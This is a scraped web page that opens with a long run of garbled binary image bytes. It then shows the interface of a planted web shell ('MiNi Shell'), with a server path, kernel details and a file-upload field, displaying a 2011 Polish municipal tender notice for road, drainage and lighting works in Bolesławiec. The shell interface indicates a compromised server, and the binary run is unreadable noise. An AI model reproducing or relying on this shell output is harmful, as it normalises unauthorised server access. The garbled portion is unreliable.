JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110128/32643-N-2011.html

<p class="kh_header"><b>Bolesławiec: Budowa dróg w osiedlu POMONA ul. Gdańska - droga z odwodnieniem i oświetleniem w Bolesławcu</b><br>
<b>Numer ogłoszenia: 32643 - 2011; data zamieszczenia: 28.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Bolesławiec , ul. Rynek 41, 59-700 Bolesławiec, woj. dolnośląskie, tel. 075 6456400, faks 075 6456402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.boleslawiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa dróg w osiedlu POMONA ul. Gdańska - droga z odwodnieniem i oświetleniem w Bolesławcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa dróg dojazdowych (3 odcinki w kształcie litery C) wraz z odwodnieniem i oświetleniem  na osiedlu mieszkaniowym POMONA przy ul. Gdańskiej w Bolesławcu. Inwestycja będzie realizowana na działkach o numerach ewidencyjnych 6/62, 6/63, 6/42, 6/35 z włączeniem do drogi powiatowej ul. Gdańska (działka nr 5) w obr. nr 8 miasta Bolesławiec. Nawierzchnie dróg wykonanych jako ciągi pieszo-jezdne z kostki betonowej gr. 8 cm na podbudowie tłuczniowej, z obustronnymi ściekami przykrawężnikowymi. Odwodnienie dróg za pomocą systemu kanalizacji deszczowej z rur kanalizacyjnych PVC O 200 ze studniami rewizyjnymi betonowymi O 1200 i studzienkami ściekowymi betonowymi z osadnikami O 425  wyposażonymi we wpusty uliczne żeliwne typu D-400, włączonej do kanalizacji ogólnospławnej k 200  w ul. Gdańskiej. Oświetlenie drogowe zasilone z istniejącej latarni, na włączeniu do ul. Gdańskiej, wymaga wymiany odcinka jednofazowej linii napowietrznej (około 27 m) zasilającego tę latarnię, a wykonanego przewodami aluminiowymi 2 x AL 25 mm2. Pomiar poboru energii i sterowanie oświetleniem za pomocą jednofazowego układu pomiarowo-sterującego z istniejącej szafki SO oświetlenia ulicznego. 
Charakterystyka:
długość dróg w osi jezdni ogółem - 246 m,
powierzchnia dróg - 1264 m2,
szerokość dróg zmienna, różna na poszczególnych odcinkach - od 4,5 m do 10,5 m,
kanalizacja deszczowa:
średnica i długość ogółem - O 200; 206,6 m,
studnie rewizyjne O 1200 - 11 szt.,
studzienki ściekowe O 425 z wpustami ulicznymi D-400 - 12 szt.,
Roboty budowlane między innymi obejmują:
- wycięcie z karczowaniem 14 szt. młodych drzew (sumaki) o średnicach pni w granicach od 3 do 11 cm, 
- usunięcie warstwy humusu z powierzchni 890,7 m2 na głębokość 20 cm i wywiezienie na odległość około 5 km - 178,14 m3, wraz z jego rozłożeniem (wyrównaniem) - warstwa o grubości około 1,2 m,
- rozebranie nawierzchni z płyt drogowych betonowych o gr. 12 cm z wywiezieniem materiału z rozbiórki na odległość około 20 km - 152,2 m2,
- rozebranie podbudowy z tłucznia o gr. 15 cm z wywiezieniem materiału z rozbiórki na odległość około 20 km - 397,3 m2,
- rozebranie nawierzchni z płyt betonowych sześciokątnych gr 10 cm z wywiezieniem materiału z rozbiórki na odległość około 20 km - 244,8 m2,
- rozebranie krawężników betonowych (96 m) i ław pod krawężniki (5,76 m3) z wywiezieniem materiału z rozbiórki na odległość około 20 km,
- dowóz gruntu i zasypanie wykopów spycharkami z zagęszczeniem gruntu - 456,7 m3,
- wykonanie kanalizacji deszczowej z rur PVC 200 mm o długości łącznej 206,6 m                   z wybudowaniem 11 studni kanalizacyjnych O 1200 mm i włączeniem do kanalizacji ogólnospławnej O 200 w ul. Gdańskiej oraz wybudowanie 12 szt. studzienek ściekowych O 425 mm z wpustami ulicznymi żeliwnymi typu ciężkiego, z syfonami i osadnikami głębokości 0,8 m,
- wykonanie koryta na głębokość 4 cm (na pow. 930,5 m2) i 14 cm (na pow. 489,5 m2),
- wywóz gruntu (ziemi) na odległość około 5 km - 105,75 m3 wraz z jego rozłożeniem (wyrównaniem) - warstwa o grubości około 1,2 m,
- profilowanie i zagęszczeni podłoża pod  warstwy konstrukcyjne - 1420 m2,
- wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 mm warstwa gr. 15 cm - 1394 m2,
- wbudowanie krawężników betonowych 20x30x100 cm ustawionych na ławie betonowej    z betonu B-15 i podsypce cementowo-piaskowej (1:4) - 510 mb,
- wbudowanie krawężników betonowych najazdowych o wymiarach 15x22 cm na podsypce cementowo-piaskowej (1:4) - 15 mb,
- wykonanie ścieków przykrawężnikowych z klinkieru drogowego na podsypce cementowo-piaskowej (2 rzędy klinkieru na płask) - 510 mb,
- ułożenie nawierzchni z szarej kostki betonowej gr. 8 cm na podsypce cementowo-piaskowej, spoiny wypełnione piaskiem - 1264 m2, 
- wykonanie wymiany nie izolowanych linii napowietrznej nn o przekroju do 50 mm2 na przewody izolowane AsXS 2x25 mm2 - 27 mb,
- wykonanie odcinków linii kablowej oświetlenia ulicznego nn. kablem YAKXS 4x25 mm2          1 kV  (286,65 m) ułożonym w rurze osłonowej DVR 75 (273 m), a przy przejściach przez drogi w rurze dwudzielnej A 83 PS; uziemienie z bednarki Fe/Zn 25x4 mm  (273 mb). Projektowany obwód oświetleniowy zasilony z istniejącej latarni przy ul. Gdańskiej. Oświetlenie dróg za pomocą latarni o wysokości 6 m (słupy ośmiokątne stalowe ocynkowane - 13 szt.) i jednej o wysokości 8 m, montowanych na fundamentach betonowych typu B-120, z oprawami typu Malaga 2 i wysokoprężnymi sodowymi źródłami światła typu SON [T] PIA Plus 70 W/230, łącznie 16 opraw, po jednej na każdym słupie z wyjątkiem latarni nr I/1/1, na której zamontować 3 oprawy, 
- badania i pomiary,
- oznakowanie poziome farbą chlorokauczukową - miejsca dla osób niepełnosprawnych - 5,5 m2,
- oznakowanie pionowe drogi: słupki z rury stalowej ocynkowanej o średnicy O 70 mm pod znaki drogowe - 6 szt.,
- pionowe znaki drogowe o pow. do 0,3 m2 - 8 szt. wg docelowej organizacji ruchu
- geodezyjna inwentaryzacja powykonawcza,
Uwaga: 
miejsce wywożenia ziemi wskaże inwestor - na odległość do 5 km; przyjęcie i składowanie nieodpłatne!
gruz z rozbiórki i inne odpady - wywóz na wysypisko na odległość około 20 km.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7, 45.23.00.00-8, 45.23.21.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w ust. VII. 1 pkt 1 - załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie, zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie, w ostatnich 5 latach, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej 1 roboty budowlanej o wartości co najmniej 500 000 zł brutto, polegającej na budowie/przebudowie/remoncie drogi/parkingu wraz wykonaniem nawierzchni z kostki betonowej, odwodnieniem i oświetleniem</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w ust. VII. 1 pkt 1  - załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie osobą lub osobami do kierowania robotami, będącą/będącymi członkami właściwej izby samorządu zawodowego i posiadającą/posiadającymi uprawnienia budowlane:
w  specjalności drogowej;
specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
w specjalności instalacyjnej w zakresie sieci i instalacji  kanalizacyjnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy 

2. Wykaz części zamówienia, których wykonanie wykonawca powierzy podwykonawcom - załącznik Nr  6

2.1 UWAGA:
Jeżeli wykonawca przewiduje podwykonawców, należy wypełnić i załączyć do oferty przetargowej załącznik Nr 6. Jeżeli wykonawca nie przewiduje podwykonawców, należy wpisać w w/w załączniku  nie dotyczy i również załączyć do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego.

1.1. W przypadkach przewidzianych w umowie dopuszcza się wprowadzanie zmian za zgodą Zamawiającego. 

1.2. Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. 

1.3. Zmiany, o których mowa w ust. 1.1 mogą dotyczyć:

1.3.1 zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych;

1.3.2 aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny;

1.3.3 zamiany producenta;

1.3.4 zmiany wymiarów, położenia lub wysokości części robót budowlanych;

1.3.5 zmiany w kolejności i terminach wykonywania robót budowlanych;

1.3.6. ustawowej zmiany wysokości podatku VAT

1.3.7 zmiana danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby Wykonawcy

1.3.8 zmiana kierownika budowy lub zmiany w składzie kierowników branżowych Wykonawcy

1.4.  Jeżeli zmiana, o której mowa w ust. 1.3, wymaga zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót budowlanych, strona inicjująca zmianę przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z informacją - o konieczności lub nie - zmiany pozwolenia na budowę oraz przedmiar i niezbędne rysunki. Projekt taki wymaga akceptacji projektanta, nadzoru autorskiego i zatwierdzenia do realizacji przez Zamawiającego. 

1.5. Warunkiem dokonania zmian, o których mowa w ust. 1.3, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego:

1.5.1 opis propozycji zmiany;

1.5.2 uzasadnienie zmiany;

1.5.3 obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana miała wpływ na wynagrodzenie Wykonawcy;

1.5.4 opis wpływu zmiany na harmonogram rzeczowo - finansowy robót i termin wykonania umowy. 

1.6. Zmiany, o których mowa w ust. 1.3, mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności:

1.6.1 obniżenie kosztu wykonania robót;

1.6.2 poprawa wartości lub podniesienia sprawności ukończonych robót budowlanych;

1.6.3 zmiana obowiązujących przepisów;

1.6.4 podniesienie wydajności;

1.6.5 podniesienie bezpieczeństwa wykonywania robót;

1.6.6 usprawnienia w trakcie użytkowania obiektu;

1.6.7 opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane  przez lub dające się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu Wykonawcy zatrudnionemu przez Zamawiającego lub Wykonawcę na terenie budowy;

1.6.8 zaistnienie nieprzewidzianych w umowie warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunków klimatycznych, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na przewidzianych w niej warunkach;

1.6.9 wystąpienia robót dodatkowych;

1.6.10 zmiany  zasad finansowania zamówienia

1.6.11 przedłużającego się oczekiwania na uzgodnienia, decyzje administracyjne, itp

1.6.12 siła wyższa. 

1.7 Podstawę obliczenia kosztów zmiany, o której mowa w ust. 1.5 pkt 1.5.3, w przypadku gdy zmiany będą wynikać ze zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania odbioru robót, stanowi projekt zamienny, o którym mowa w ust. 1.4, oraz:

1.7.1 kosztorys ofertowy opracowany na podstawie cen jednostkowych lub dane wyjściowe do kosztorysowania przyjęte do sporządzenia kosztorysu ofertowego Wykonawcy, ceny jednostkowe pracy sprzętu i materiałów zaproponowanych przez Wykonawcę, ale nie większe niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych, lub

1.7.2 kalkulacja uproszczona sporządzona w oparciu o uzgodniony z Zamawiającym publikator cen jednostkowych robót budowlanych, np.  SEKOCENBUD dla  kwartału poprzedzającego termin wykonania robót budowlanych.

1.8. Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę; w takim przypadku koszty dodatkowe związane z takimi zmianami ponosi Wykonawca. 

1.9. Dokonanie zmian, o których mowa w ust. 1.3, wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.um.boleslawiec.bip-gov.pl/public/?id=50080<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać osobiście w pok. Nr 509-Biurowiec, pl. Piłsudskiego 1, 59-700 Bolesławiec w godz. 9-14. Dokumentację przetargową można pobrać również bezpłatnie ze strony internetowej zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2011 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego, 59-700 Bolesławiec, Rynek 41-Ratusz, pokój nr 101 (sekretariat), lub przesłać na powyższy adres.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com